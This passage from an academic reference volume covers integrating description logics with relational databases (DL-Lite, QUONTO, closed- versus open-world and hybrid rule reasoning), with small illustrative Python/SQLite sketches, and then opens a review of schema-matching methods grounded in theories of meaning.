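con = sqlite3.connect(":memory:")
# SQLite has no ENUM, so a CHECK constraint plays that role here.
con.execute("""CREATE TABLE Company (
    name TEXT NOT NULL PRIMARY KEY,
    type TEXT NOT NULL CHECK (type IN ('Manufacturer', 'Supplier')))""")

con.execute("INSERT INTO Company VALUES ('Clocks Inc.', 'Manufacturer')")  # complete data: accepted

try:
    # 'ACME Corp. is a company' with no further detail: the mandatory type is missing.
    con.execute("INSERT INTO Company (name) VALUES ('ACME Corp.')")
except sqlite3.IntegrityError as e:
    print("rejected:", e)   # NOT NULL constraint failed: Company.type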
INTEGRATION EFFORTS

Currently, databases aggregated from heterogeneous data sources (such as those in the EE scenario) are typically stored in large RDBMS, which can store and retrieve data with extreme
efficiency. However, a user or a manager in the EE faces two challenging tasks when trying to access different data sources (e.g., RDBMS, KBs, or other structured data). On the one hand, keeping the integrity of databases may turn out not to be a trivial process; on the other hand, querying data aggregated from different sources might be impossible. Since consistency checking and other reasoning services are tasks that in DLs come for free, and since storage and retrieval systems like RDBMS provide the best performance, many efforts have been devoted in the last few years to investigating frameworks that allow DL KBs and RDBMS to be used together, exploiting their strengths and reducing their weaknesses. In this section, we present two popular approaches to information integration: DL-Lite, a framework that helps in using DL reasoning services to query data stored in relational databases, and hybrid reasoning frameworks, which combine closed-world reasoning on top of knowledge bases with open-world reasoning.
Expressiveness and Performance with DL-Lite

We have seen that both RDBMS and DLs have drawbacks in their use: RDBMS do not allow for reasoning, have loose support for logical consistency, a basic form of which is obtained by means of (possibly complex) integrity constraints and triggers, and have low expressiveness. DLs, in turn, are not tailored to managing large ABoxes (i.e., large amounts of data), since this requires reasoning also over concept definitions, that is, over the TBox, and may have an extremely high computational complexity, depending on the constructors used; moreover, understanding the formalism can be challenging. In the last decade, investigation in the field of Description Logics has developed in two main directions.
• Following the increasing demand for expressive languages in both KR and the SW, the limits of expressiveness and computational complexity were pushed forward with the definition of new algorithms for very complex DLs, like for example SROIQ (Horrocks, Kutz, & Sattler, 2006), which is the base of the proposed revision 1.1 of the Web Ontology Language (OWL5). We will not cover this development branch, since we are more interested in the integration between RDBMS and DLs than in the investigation of very expressive languages.
• A lot of effort has been devoted to identifying simpler languages that, although limited in expressiveness, are useful for some specific applications. In this section, we focus our attention on a family of DLs, called DL-Lite (Calvanese et al., 2005), which offers interesting characteristics for information integration, in order to tackle the drawbacks presented at the beginning of this section. In particular, DL-Lite has the ability to exploit RDBMS technologies for storing large amounts of data, to check data consistency by means of logical inference, and to express complex queries over the RDBMS by translating formal queries into SQL queries.
Especially in the Semantic Web community, KBs (commonly called ontologies) have been employed not only as a means for describing domains, but also as a conceptual view over data, that is, as an abstract means for interpreting the structure of the domain underlying instance data stored in a relational database. Indeed, Semantic Web technologies are not yet widely used for storing the axioms of knowledge bases, and developers tend to use RDBMS, which are more mature, as ontology repositories. The use of ontologies as a conceptual view can also help address other issues related to the continuously growing need for information integration and access. Suppose you have
the necessity to merge distinct databases into a single one: obviously, you need to preserve data consistency. To avoid comparing the different schemata by hand in order to check whether there are incoherent tables or misaligned tuples stored in the tables, it proves useful to exploit the representation provided by semantics-aware KBs, together with the inference services supplied by the underlying logical formalism, and let a description logic system carry out this work. If the response is positive, then the new database is logically consistent; otherwise it becomes necessary to modify the schema. From a computational point of view, DL-Lite6 is a very simple language, as the satisfiability of a KB can be computed in polynomial time. The grammar of DL-Lite is shown in Figure 4, where A, B, C denote concepts and R denotes a role. DL-Lite allows for existential quantification (∃R), inverse roles (∃R−), negation of concepts (¬B), and conjunction of concepts (C1 ∩ C2). DL-Lite also permits the expression of inclusion assertions, B ⊆ C, i.e., assertions about hierarchy relations among concepts, and of functionality assertions, (funct R), (funct R−). The expressiveness of DL-Lite is therefore limited, but it suffices to capture, for example, the semantics of UML class diagrams7 and ER diagrams (Chen, 1976), i.e., DL-Lite has the same modeling capabilities as these two formalisms. From this relation between DL-Lite and ER, it follows that DL-Lite can also capture the semantics of RDBMS, allowing the data carried by tuples in tables to be expressed by means of DL axioms. However, this is not enough to guarantee that the integration between DL-Lite and RDBMS is straightforward. Indeed, typical reasoning
Figure 4. The grammar of DL-Lite

B ::= A | ∃R | ∃R−
C ::= B | ¬B | C1 ∩ C2
processes are different in the two formalisms: recalling the parallel between TBox and tables and between ABox and tuples, users of RDBMS are typically interested in querying instance data and not the structural properties of tables, that is, they are interested in data complexity. In DLs, querying the data (ABox) is generally more complex than querying the schema, since ABox reasoning also requires considering, during the reasoning process, the definitions of all the concepts involved, and not only the instance data. Hence, there are more axioms to be considered and reasoning is obviously affected. Moreover, a basic reasoning task in DLs is query answering, but the typical SQL query posed to a RDBMS is equivalent to what is called conjunctive query answering in DLs, which is a far more complex task than simple query answering, since it amounts to answering many queries at the same time and then combining the results. There is an interesting implementation of DL-Lite, called QUONTO (Acciarri et al., 2005), which reflects all the features of DL-Lite. QUONTO stores the data in a RDBMS, permitting the storage of large quantities of data; moreover, it allows a user to pose conjunctive queries to the knowledge base by transforming them into SQL queries, retrieving the results from the underlying RDBMS.
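The following sketch is not QUONTO's rewriting algorithm (which also compiles the TBox into the query); it only illustrates, under simplifying assumptions we introduce here (unary and binary predicates stored in like-named tables with columns c0 and c1, variables only, and a single answer variable x), how the atoms of a conjunctive query can be mapped onto a SQL join.

# A schematic (and much simplified) translation of a conjunctive query into SQL.
def to_sql(atoms):
    # atoms: list of (predicate, [variables]); shared variables become join conditions.
    tables, where, binding = [], [], {}
    for i, (pred, args) in enumerate(atoms):
        alias = f"t{i}"
        tables.append(f"{pred} {alias}")
        for j, var in enumerate(args):
            col = f"{alias}.c{j}"
            if var in binding:
                where.append(f"{col} = {binding[var]}")
            else:
                binding[var] = col
    return (f"SELECT DISTINCT {binding['x']} FROM " + ", ".join(tables)
            + (" WHERE " + " AND ".join(where) if where else ""))

# q(x) <- Product(x), isDistributedIn(x, y), Market(y)
print(to_sql([("Product", ["x"]), ("isDistributedIn", ["x", "y"]), ("Market", ["y"])]))
# SELECT DISTINCT t0.c0 FROM Product t0, isDistributedIn t1, Market t2
#   WHERE t1.c0 = t0.c0 AND t2.c0 = t1.c1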
INTEGRATING CWA AND OWA WITH HYBRID REASONING

In the previous section, we presented a framework that is capable of integrating the richer palette of constructs provided by DLs with the unparalleled performance of RDBMS. The purpose was to enable practical implementations of KBs that retain the open-world semantics of the former and take advantage of the inference techniques that were developed for DLs. In this section, instead, we introduce the issues related to the
conjunct evaluation of open- and closed-world data structures, where each retains its individual semantics. This sort of integration is becoming increasingly important because proprietary data structures, such as those stored by individual business subjects in their KBs, are frequently integrated with external data sources upon which traditional assumptions may no longer hold. Specifically, in many current scenarios it is not correct to consider a given piece of information as "false" only because a positive acknowledgment cannot be retrieved from the local system. In fact, such information may exist in the wider context of an extended enterprise, as the local system may be outdated or misaligned with the external contributions to the KB. In this case, the correct approach is to consider a statement as false only when the information actually stored by the system can rule out such a possibility. On the contrary, mainstream data management facilities (e.g., RDBMS) rely on the assumption that everything not explicitly stated in the database can automatically be considered false. Therefore, we now provide an example of how this difference becomes significant when applying inference techniques to derive information not explicitly stated in the KB. We then provide an overview of existing approaches to hybrid reasoning. Throughout the chapter, we have highlighted the differences in expressiveness between the relational model, as implemented by RDBMS, and the ontology-based models that can be expressed as DL data structures. However, it should be pointed out that the semantics conveyed by RDBMS, as opposed to that of DLs, may sometimes provide the only correct interpretation of instance data. As an example, if we consider entity Article as the concept definition categorizing only those goods that are produced or distributed by the business subject under consideration (i.e., they are to be considered exhaustively detailed), then the query in (3) (expressed for convenience in natural language) amounts to verifying which
instances of concept Article do not have two or more TargetMarkets associated with them.

retrieve articles that are distributed in at most one target market    (3)

This can be straightforwardly implemented as a SQL query, and we can be confident that the query (a) will return all the results and (b) will not contain false positives. Suppose now that we extend the KB with concept Product in order to express, in addition to the goods produced by the business subject, also those goods that are produced by different business entities (e.g., competitors). This concept will typically be populated with instances by monitoring markets, executing surveys, and in general by collecting data sources that may not be complete or up-to-date. Moreover, members of concept Product can be related to the specific Markets they are distributed in8, but we cannot be sure that a product is not distributed in a given market only because no such evidence can be retrieved from the knowledge base. The reformulation of (3) taking into account the new concept definition is the following:

retrieve products that are distributed in at most one market    (4)

In this case, a SQL query may not retrieve the correct results; for instance, false positives may be introduced because the system is not aware of all the markets products are distributed in. Instead, the approach provided by DL reasoners constitutes the correct interpretation of the data model9. Statement (4) can easily be translated into DL structures; specifically, the following DL axiom defines concept Query, whose instances are those requested in (4):

Query ≡ Product ∩ ≤1 isDistributedIn.Market    (5)
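As a rough illustration of why (3) is safe under the CWA, the following sketch (with invented table names article and distributedIn and invented rows) counts the recorded target markets of each article; the same pattern applied to (4) would silently treat unrecorded markets as non-existent.

import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
CREATE TABLE article (name TEXT PRIMARY KEY);
CREATE TABLE distributedIn (article TEXT, target_market TEXT);
INSERT INTO article VALUES ('anvil'), ('toaster');
INSERT INTO distributedIn VALUES ('anvil', 'italy'), ('anvil', 'france'), ('toaster', 'italy');
""")

# Query (3) under the CWA: count the recorded target markets of each article.
sql = """SELECT a.name FROM article a
         LEFT JOIN distributedIn d ON d.article = a.name
         GROUP BY a.name HAVING COUNT(d.target_market) <= 1"""
print(con.execute(sql).fetchall())   # [('toaster',)] -- correct only if the table is exhaustive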
So far it seems that, once the correct semantics of the data structures to be modeled is clarified, it is possible to identify the category of applications that can execute a sound and complete inference on these data structures. Now, suppose that the definition in (6) is added to the knowledge base to express that a TargetMarket in which no Product (i.e., goods produced by third parties) is distributed is to be considered a MonopolyMarket:

a monopoly market is a target market in which no product is distributed    (6)

On the one hand, listing TargetMarkets can be effectively achieved in the closed world, by assuming that the markets in which articles are distributed are exhaustively described in the knowledge base. On the other hand, determining MonopolyMarkets amounts to determining, in the open world, which TargetMarket features a competitor distributing its products in it. This is the typical situation in which choosing either one of the interpretations presented in this chapter may produce unexpected results, because it may fail to retrieve the correct answers to a query. Instead, it is necessary to combine both approaches into a hybrid knowledge base that reflects the distinct semantics of its data structures. As the closed-world component to be integrated with DL-based, open-world KBs, the best candidate is LP (Logic Programming) (Lloyd, 1987), the renowned formalism grounding Prolog engines. Since the latter are not the only inference engines implementing this category of logic-based, closed-world reasoning (e.g., another outstanding example is the Jena framework10), we will generally refer to these applications as rule reasoners. In this section, we survey the main approaches to this kind of integration and the open issues related to them. A rule is constituted by an antecedent (a.k.a. the rule body) containing the conjunctive pattern of atomic conditions that, when evaluating to true in the KB, triggers the insertion in the latter of
277
Approaches to Semantics in Knowledge Management
the data structures contained in the consequent (a.k.a. the rule head): A1 ∧ . . . ∧ An → C
(7)
There is a general correspondence between constructs in rules and DL axioms; for example, implication (→) can be modelled as subsumption (⊆), and conjunction (∧) is semantically equivalent to intersection (∩). However, rules allow for more general structures than DLs. As an example, the atoms A1 . . . An in (7) can contain n-ary relations, while DL is limited to expressing unary and binary relations. Consequently, a basic requirement for the integration of the two reasoning paradigms is a common language for interleaving DL-based class (concept) and property (role) definitions with general-purpose inference rules. SWRL (Semantic Web Rule Language) (swrl, 2004) is the de facto standard for embedding rule definitions into ontologies; more specifically, SWRL defines the structural components of rules (atoms, variables, etc.) as OWL classes and properties, so that rules can be introduced into ontologies by instantiating these entities.

Establishing a common representation framework, however, takes us less than half the way towards the implementation of a hybrid system; in fact, SWRL at large is known to be undecidable. In order to discern which data structures are amenable to actual execution, we have to consider the theoretical aspects behind hybrid reasoning. Besides termination, it is also important to what extent hybrid reasoning can be sound and complete. As a straightforward example of how the completeness of inference procedures may be jeopardized by dividing a knowledge base into separate components, suppose that we further categorize concept Reseller into ShopRetailer and Web-enabledRetailer, as in the following DL axiom:

Reseller ≡ ShopRetailer ∪ Web-enabledRetailer (8)
Now, suppose that the following discount rates are defined: shop retailers receive a discount of 15%, and Web-enabled retailers receive a discount of 10%. These assignments of discount rates are then translated into rules and executed by the rule component of the knowledge base:

ShopRetailer(x) → hasDiscount(x, 15%) (9)

Web-enabledRetailer(x) → hasDiscount(x, 10%) (10)

It is clear that the joint evaluation of the two components cannot infer that a generic instance of class Reseller is a valid answer to the query 'retrieve resellers that have a discount associated with them.' Specifically, this happens because the multiple models computed by DL reasoners are incompatible with the closed-world inference implemented by rule reasoners. As a consequence, the possibilities examined by DL reasoning (that is, a Reseller being either a ShopRetailer or a Web-enabledRetailer) will not trigger either of the rules (9) and (10).
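The failure of rule reasoners to reason by cases can be reproduced with a minimal forward-chaining sketch in plain Python; the fact and rule encodings below are hypothetical simplifications, not an actual DL or SWRL engine. The disjunctive knowledge that a reseller is either a shop retailer or a Web-enabled retailer is never materialized as a concrete fact, so neither discount rule fires.

```python
# Minimal forward chainer over ground facts (a sketch, not a DL reasoner).
facts = {("Reseller", "acme")}           # all we assert about acme
rules = [
    # (condition class, consequent template) for rules (9) and (10)
    ("ShopRetailer",        lambda x: ("hasDiscount", x, "15%")),
    ("Web-enabledRetailer", lambda x: ("hasDiscount", x, "10%")),
]

changed = True
while changed:                           # fire rules until a fixpoint is reached
    changed = False
    for cls, head in rules:
        for fact in list(facts):
            if fact[0] == cls and head(fact[1]) not in facts:
                facts.add(head(fact[1]))
                changed = True

# No fact ShopRetailer(acme) or Web-enabledRetailer(acme) is ever present,
# so no discount is derived, even though axiom (8) entails that acme,
# being a Reseller, must belong to one of the two subclasses.
print(any(f[0] == "hasDiscount" for f in facts))   # False
```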
With regard to the separation between open- and closed-world components of a knowledge base, the picture is multi-faceted because, as we have seen, combining decidable instances of both paradigms does not necessarily result in a decidable, sound, and complete system. A typical example of non-termination is constituted by cyclic definitions, which may sometimes be the most intuitive way of expressing a concept, as in the definition Person ≡ ∃ hasParent.Person. Rule systems cannot unwind the infinite chain that this simple definition can produce the way DL reasoners do. However, because of the interesting computational properties that acyclic terminologies enjoy, cyclic definitions are typically ruled out in practical applications. Moreover, the example above shows that completeness of deductions cannot be granted unless particular care is taken in the interchange of structures between these distinct worlds, that is, the entities that are shared between the ontology and the rule base. In particular, the interplay between the weaker form of negation-as-failure that is typically implemented by rule systems and the strong negation of DL systems may prevent inference from being complete (Damásio et al., 2005).

Consequently, the state of the art offers competing views on how to implement hybrid systems. A first approach bounds the expressiveness of the structural (i.e., DL-based) component to avoid "dangerous" constructs: AL-log (Donini et al., 1998) is an early example of a hybrid system and integrates ALC knowledge bases with a relational component constituted by Datalog rules11; the KAON2 framework (Motik et al., 2005), instead, allows the SHIQ fragment of an OWL DL KB to be cast into Description Logic Programs (Grosof et al., 2003), which can be executed by LP systems. Another approach restricts the interaction of the structural and relational components, rather than the expressiveness of either. DL-safe rule bases (Motik et al., 2005) can be integrated with full SHOIN(D) but require every variable to occur in a non-DL atom in the rule body. Specifically, non-DL literals of the form O(x) are added for each variable x in the rule body, and a fact O(a) is added to the non-DL component of the knowledge base for each individual a. The most evident consequence of this is that rules only apply to existing individuals, a limitation that clearly does not exist in DL reasoners.

Ontology editors sometimes provide facilities for integrating the different aspects discussed so far: Protégé (Knublauch, Fergerson, Noy, & Musen, 2004) features a plugin to edit SWRL rules, and it is possible to process the knowledge base with either a DL reasoner or the Jess inference engine.12 The Swoop editor13 has an experimental development branch that allows SWRL rules embedded in ontologies to be evaluated by means of SWI-Prolog. Finally, Hoolet14 is a prototypical implementation of an OWL-DL reasoner that uses the very efficient Vampire first-order prover15 for processing SWRL rules.
REFERENCES

Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of databases. Addison-Wesley.
Acciarri, A., Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., Palmieri, M., et al. (2005). QuOnto: Querying ontologies. In Proceedings of the 20th National Conference on Artificial Intelligence (AAAI 2005) (pp. 1670-1671).
Arbib, M. A., & Hanson, A. R. (Eds.). (1987). Vision, brain, and cooperative computation. Cambridge, MA, USA: MIT Press.
Baader, F., Calvanese, D., McGuinness, D., Nardi, D., & Patel-Schneider, P. F. (Eds.). (2003). Description logic handbook: Theory, implementation and applications. Cambridge University Press.
Balkenius, C. (1993). Some properties of neural representations. In M. Bodén & L. Niklasson (Eds.), Selected readings of the Swedish conference on connectionism.
Balkenius, C., & Gärdenfors, P. (1991). Nonmonotonic inferences in neural networks. In KR (pp. 32-39).
Boley, H., Dean, M., Grosof, B., Horrocks, I., Patel-Schneider, P. F., & Tabet, S. (2004). SWRL: A Semantic Web rule language combining OWL and RuleML.
Calvanese, D., De Giacomo, G., Lembo, D., Lenzerini, M., & Rosati, R. (2005). Tailoring OWL for data intensive ontologies. In Proceedings of the Workshop on OWL: Experiences and Directions (OWLED 2005).
Chen, P. P. (1976). The entity-relationship model: Toward a unified view of data. ACM Transactions on Database Systems, 1(1), 9-36.
Codd, E. F. (1990). The relational model for database management: Version 2. Boston, MA, USA: Addison-Wesley Longman.
Damásio, C. V., Analyti, A., Antoniou, G., & Wagner, G. (2005, September 11-16). Supporting open and closed world reasoning on the Web. In Proceedings of Principles and Practice of Semantic Web Reasoning, 3rd International Workshop (PPSWR 2005), Dagstuhl Castle, Germany (Vol. 4187). Springer.
De Giacomo, G., Lenzerini, M., Poggi, A., & Rosati, R. (2006). On the update of description logic ontologies at the instance level. In AAAI 2006.
Donini, F. M., Lenzerini, M., Nardi, D., & Schaerf, A. (1998). AL-log: Integrating Datalog and description logics. Journal of Intelligent Information Systems, 10(3), 227-252.
Frege, G. (1918). Der Gedanke: Eine logische Untersuchung. Beiträge zur Philosophie des Deutschen Idealismus, I, 58-77.
Grosof, B. N., Horrocks, I., Volz, R., & Decker, S. (2003). Description logic programs: Combining logic programs with description logic. In Proceedings of the 12th International World Wide Web Conference (WWW 2003) (pp. 48-57). ACM.
Haase, P., & Stojanovic, L. (2005). Consistent evolution of OWL ontologies. In ESWC (pp. 182-197).
Healy, M. J., & Caudell, T. P. (2006). Ontologies and worlds in category theory: Implications for neural systems. Axiomathes, 16(1-2), 165-214.
Horrocks, I., Kutz, O., & Sattler, U. (2006). The even more irresistible SROIQ. In Proceedings of the 10th International Conference on Principles of Knowledge Representation and Reasoning (KR 2006) (pp. 57-67). AAAI Press.
Kelly, J. J. (1997). The essence of logic. Upper Saddle River, NJ, USA: Prentice-Hall.
Knublauch, H., Fergerson, R. W., Noy, N. F., & Musen, M. A. (2004). The Protégé OWL plugin: An open development environment for Semantic Web applications. In International Semantic Web Conference (pp. 229-243).
Kohonen, T. (2000). Self-organizing maps. Springer.
Kurfess, F. J. (1999). Neural networks and structured knowledge: Knowledge representation and reasoning. Applied Intelligence, 11(1), 5-13.
Liu, H., Lutz, C., Milicic, M., & Wolter, F. (2006). Updating description logic ABoxes. In KR (pp. 46-56).
Lloyd, J. W. (1987). Foundations of logic programming (2nd extended ed.). New York, NY, USA: Springer-Verlag.
Minsky, M. (1986). The society of mind. New York, NY, USA: Simon & Schuster.
Montague, R. (1974). Formal philosophy: Selected papers of Richard Montague (edited, with an introduction, by Richmond H. Thomason). New Haven, CT: Yale University Press.
Motik, B., Sattler, U., & Studer, R. (2005). Query answering for OWL-DL with rules. Journal of Web Semantics, 3(1), 41-60.
Piaget, J. (1952). The origins of intelligence in children. New York, NY: Norton.
Piaget, J., & Inhelder, B. (1973). Memory and intelligence. Basic Books.
Rumelhart, D. E., & McClelland, J. L. (1986). Parallel distributed processing. Cambridge, MA, USA: MIT Press.
Russell, B. (1908). Mathematical logic as based on the theory of types. American Journal of Mathematics, 30, 222-262.
Schank, R. C., & Abelson, R. P. (1977). Scripts, plans, goals and understanding: An inquiry into human knowledge structures. Hillsdale, NJ: L. Erlbaum.
Smolensky, P. (1993). On the proper treatment of connectionism. In Readings in philosophy and cognitive science (pp. 769-799). Cambridge, MA, USA: MIT Press.
Wynne-Jones, M. (1991). Constructive algorithms and pruning: Improving the multi layer perceptron. In R. Vichnevetsky & J. J. Miller (Eds.), 13th IMACS World Congress on Computation and Applied Mathematics (Vol. 2, pp. 747-750).

ENDNOTES

1. Knowledge can also be stored in distributed physical sources, which can be considered as a single logical one from the user's point of view. However, we will not cover these aspects here.
2. Note that attributes are written lowercase and fillers are capitalised.
3. Defined concepts are written in boldface for the sake of readability.
4. Note that, since (A ∪ B) ≡ ¬(¬A ∩ ¬B), a DL supporting negation and conjunction also supports disjunction.
5. http://webont.org/owl/1.1/index.html
6. We denote henceforth with DL-Lite the simplest language of the family, although our considerations are valid for other DL-Lite variants.
7. http://www.omg.org/uml/
8. Note that Market is defined as a superclass of TargetMarket, because Products are not necessarily distributed in the markets in which Articles are distributed.
9. Note that we have been using the term 'interpretation' in the broader sense of 'the act of interpreting,' while in the DL jargon inspired by model theory it denotes a 'mapping from the language to a world.'
10. http://jena.sourceforge.net/
11. Datalog programs do not feature negation and also comply with a safety condition according to which variables in the head of rules must also occur in the body.
12. http://herzberg.ca.sandia.gov/
13. http://code.google.com/p/swoop/
14. http://owl.man.ac.uk/hoolet/
15. http://reliant.teknowledge.com/cgi-bin/cvsweb.cgi/Vampire/
This work was previously published in Semantic Knowledge Management: An Ontology-Based Framework, edited by A. Zilli, E. Damiani, P. Ceravolo, A. Corallo and G. Elia, pp. 146-171, copyright 2009 by Information Science Reference (an imprint of IGI Global).
Chapter 1.20
Theories of Meaning in Schema Matching: A Review
Joerg Evermann Memorial University of Newfoundland - St. John's, Canada
ABSTRACT
Schema matching is the identification of database elements with similar meaning as preparation for subsequent database integration. Over the past 20 years, different schema-matching methods have been proposed and have been shown to be successful to various degrees. However, schema matching is an ongoing research area and the problem is not yet considered to be solved. This article reviews existing schema-matching methods from the perspective of theories of meaning drawn from philosophy and psychology. It positions existing methods, raises questions for future research based on these theories, and shows how these theories can form a firm theoretical basis as well as guide future schema-matching research.

INTRODUCTION
Database integration is an increasingly important activity. Information systems development often requires integrating existing systems and their databases. Data warehousing requires the integration of data from multiple transaction-processing systems for decision support. Electronic business between organizations requires the integration of trade partners’ business data for efficient business processes. Interagency information sharing in e-government requires integration of data about citizens (Bajaj & Ram, 2003). Database integration is a process with multiple steps, leading from the identification of the databases to the testing of the integrated system. The central step of the database integration process is
the identification of those elements in the schemata of the databases that match each other. This step is termed schema matching. Schema matching can be applied to different data representations, whether they are relational, object oriented, or XML (extensible markup language) based. Existing work on schema matching has focused primarily on relational databases. Schema matching can be applied on the conceptual level, where schema elements are entity types or attributes and relationship types, or it can be applied on the physical level, where schema elements are tables, fields, and foreign-key relationships. Many different methods for matching database schema elements have been proposed (Batini, Lenzerini, & Navathe, 1986; Rahm & Bernstein, 2001). The partial success of the proposed methods shows that the problem is not yet completely solved. The purpose of a review is to provide a new conceptualization of a field and raise unresolved research issues (Webster & Watson, 2002). Consequently, this research review article has three aims. First, it proposes a new theoretical foundation for schema matching. Second, it uses this theoretical foundation to examine and position existing schema-matching methods. Third, based on this theoretical foundation and the positioning of existing schema-matching methods, it points out possible avenues for future research in schema matching. A solid theoretical basis that informs the research in a discipline is seen as essential to the discipline’s maturation (Weber, 1997, 2003). In this sense, the proposed theoretical foundation for schema matching is similar to the role that ontology plays in the wider discipline of information systems development (Wand & Weber, 1990). Wand and Weber’s ontological foundation provided a framework with which to understand existing IS development research and point out future research directions (Wand & Weber, 2002). We hope this article will make a similar contribution to schema-matching research.
The remainder of the article is structured as follows. The second section proposes a new conceptualization of schema-matching research based on theories of meaning. This conceptualization is followed by an introduction to existing schema-matching methods. Then, the article introduces specific theories of meaning and analyzes their use in schema matching. It also presents research questions raised in connection with individual theories of meaning. Next, we position schema-matching methods into the theoretical foundation and offer suggestions for further empirical studies, before concluding the article.
SCHEMA MATCHING AND MEANING Consider a situation that requires the integration of production management data with marketing data for a decision support system. The marketing database contains information about products and articles, while the production database contains information about parts and components (Figure 1). How does a database integrator decide which of these elements match each other? What criteria does the database integrator apply? We propose that the database integrator makes use of an, often implicitly held, theory of meaning. In the example data model in Figure 1, the schema elements Product and Article are matched if the database integrator decides they have the same meaning. Similarly, the elements ProductID and SerialNum are matched if they have the same meaning to the database integrator. The theory of meaning held by the database integrator determines whether they have the same meaning. Hence, the theories of meaning held by database integrators, or humans in general, are relevant to schema matching. Knowing that database integrators hold a theory of meaning is not yet helpful to the concrete schema-matching problem at hand. How does the database integrator decide whether Product and
Article have the same meaning? Is it because products and articles refer to the same things (e.g., things on the factory floor)? Is it because products and components are in the same kind of relationship as articles and parts? Or is it perhaps because products and articles are described by similar features; that is, the primary keys are both of type character? Is it because the data in the corresponding tables Product and Article are used in similar ways or stem from similar sources? The central problem in schema matching is the following question: What does it mean to say that two schema elements have the same meaning? What theory of meaning does the database integrator hold and apply to the problem at hand? All humans implicitly hold their own theory of meaning that is used to make numerous decisions in daily life. When presented with any two terms, everyone is able to judge whether the terms have the same meaning or not, although such judgments may differ from person to person. Furthermore, many people may not be fully aware of how they make such judgments. This review article argues that the identification and explication of the theories of meaning held by database integrators through means of empirical research is relevant to the field of schema matching and beneficial to the improvement of methods in this field.
Schema-matching methods embody the theory of meaning held by their developer. A schema-matching method is perceived as successful by its human users when it matches schema elements according to the same criteria that its human users would apply and to which its human users expect it to conform. Consequently, the method's success, as perceived by its users, depends on both the users and the developers holding the same, or at least compatible, theories of meaning. Hence, when schema-matching methods are developed, the method developers must identify and take into account the theory of meaning of database integrators as users of the method. Furthermore, without clearly explicating the theory of meaning embodied in the method and the theory of meaning held by the method user, the evaluation of schema-matching methods (e.g., Lerner, 2000; Yeh, Porter, & Barker, 2003) by their users may be comparing the proverbial apples and oranges: The method's theory of meaning and the user's theory of meaning may be different. Consequently, it would not be surprising if the results produced by the method did not meet the user's expectation. Unless the theory of meaning embodied in a schema-matching method is shown to match that of the method's user, any perceived integration success in a particular situation may
be specific to a particular context and may not be a representative indicator of the capabilities of the method. Hence, identifying the theory of meaning held by a schema-matching method’s users is important in evaluating the method’s performance. Finally, the results of an empirical evaluation of a schema-matching method can give little guidance to its improvement without an explicit theoretical basis. For example, when the precision of a schema-matching method is judged poor, this result by itself gives little indication as to which direction improvements might be sought. Only in connection with a comparison of the theories of meaning held by a method’s developer and its users can empirical results point to ways of improving the schema-matching method. In summary, this section argues for the importance of theories of meaning for the development, evaluation, and improvement of schema-matching methods. Therefore, this review will make three contributions, in line with the three aims of this article as laid out previously. First, the introduction of theories of meaning from reference disciplines to the field of schema matching allows the use of these theories in future schema-matching research. Second, these theories are used as a framework to position and understand existing schema-matching methods. Third, positioning and examining existing schema-matching research within these theories raises research opportunities and new research questions whose answers can guide the future development of schema-matching methods and provide criteria for their design and evaluation. This article does not make recommendations as to which theory of meaning database integrators should adopt in a given situation. Instead, as argued above, the premise is that everyone holds, often implicitly, a theory of meaning. The article argues for the identification, explication, and consideration of theories of meaning that are held by humans in order to benefit research on schema-matching methods. In fact, the identifica-
tion of the theory of meaning held by database integrators is one of the empirical research questions raised in this article.
EXISTING SCHEMA-MATCHING METHODS Schema-matching methods are primarily categorized by their use of schema-level or instance-level information (Batini et al., 1986; Rahm & Bernstein, 2001; T.-W. Wang & Murphy, 2004). Table 1 gives an overview of existing schema-matching methods and their features; the appendix contains further descriptions of each schema-matching method or tool proposed in the literature. The table shows the types of information used for matching: Schema structure and data types are used for schema-level matching, aggregate instance information is used for instance-level matching, and thesauri and lexicographic information can be applied at both levels. Table 1 also distinguishes schema-matching methods by the type of element that is being matched: Some methods are designed to match entities or tables, while others are designed to match attributes or fields. Many schema-matching methods use more than one type of information and are designed to match more than one type of schema element.
Schema-Level Methods

Most of the surveyed schema-level methods (Table 1) use linguistic as well as syntactic (constraint) information. Linguistic information is used either by measuring the similarity of schema element names through comparison of character strings (Bertino, Guerrini, & Mesiti, 2004; Gotthard, Lockemann, & Neufeld, 1992; Lerner, 2000; Mitra, Wiederhold, & Kersten, 2000; Palopoli, Sacca, Terracina, & Ursino, 2003), or by using externally supplied lexical databases or dictionaries (Bright, Hurson, & Pakzad, 1994; Castano, De Antonellis, & De Capitani di Vimercati, 2001; Hayne & Ram, 1990; Melnik, Garcia-Molina, & Rahm, 2002; Noy & Musen, 2001, 2003; Yeh et al., 2003), such as WordNet (Fellbaum, 1998). These databases provide lists of homonyms, synonyms, and other semantic relationships between words. Linguistic information is applicable to problems where schema element names are descriptive, rather than acronyms or cryptic abbreviations (Kang & Naughton, 2003; Zhao & Ram, 2004). For example, a database schema with tables and attributes with abbreviated names or acronyms such as TAB-BKHY and ATTR-BGHO offers little linguistic information.

Table 1. Overview of schema-matching methods and the notion of meaning each embodies (the original table additionally records, for each method, the information used for matching, the type of element primarily matched, the underlying data model, any statistical or learning techniques employed, and whether an empirical evaluation was performed)

Clio: Two attributes have the same meaning if their features are identical.
Biskup & Embley (2003): Two attributes have the same meaning if they are lexicographically similar and possess similar instances.
Bertino et al. (2004): Two documents have the same meaning if they have the same structure; two elements in a document have the same meaning if their names are identical.
TESS: Two schema elements have the same meaning if they have the same name and same type.
KBMatch: Two terms have the same meaning if they have the same relations to other objects.
ARTEMIS: Two attributes have the same meaning if they are synonymous in an external thesaurus and have the same domain.
DIKE: Two terms have the same meaning if they are lexicographically similar, or if their relationships to other terms that are lexicographically similar are of the same type.
GLUE: Two terms have the same meaning if their instances co-occur.
Autoplex: Two attributes have the same meaning if they have the same distribution of values.
Kang & Naughton (2003): Two attributes have the same meaning if their values determine and are determined by the values of the same set of attributes.
iMapper: Two terms have the same meaning if they have the same distribution of assigned documents.
Anchor-PROMPT: Two terms have the same meaning if they have the same structural relations to other terms.
WHIRL: Two terms have the same meaning if they have the same distribution throughout all documents.
Chua et al. (2003): Two groups of attributes have the same meaning if their values can be explained by a regression function.
SEMINT: Two attributes have the same meaning if they possess the same syntactic specification and the same distribution of values.
SimFlood: Two terms have the same meaning if they are lexicographically similar, or if their relationships to other terms that are lexicographically similar are of the same type.
ATBE: Two structures have the same meaning if they can be made equivalent by renaming or deletion and addition operations.
MUVIS: Two terms have the same meaning if they are lexicographically similar, and have similar (lexicographic and syntactic) attributes.
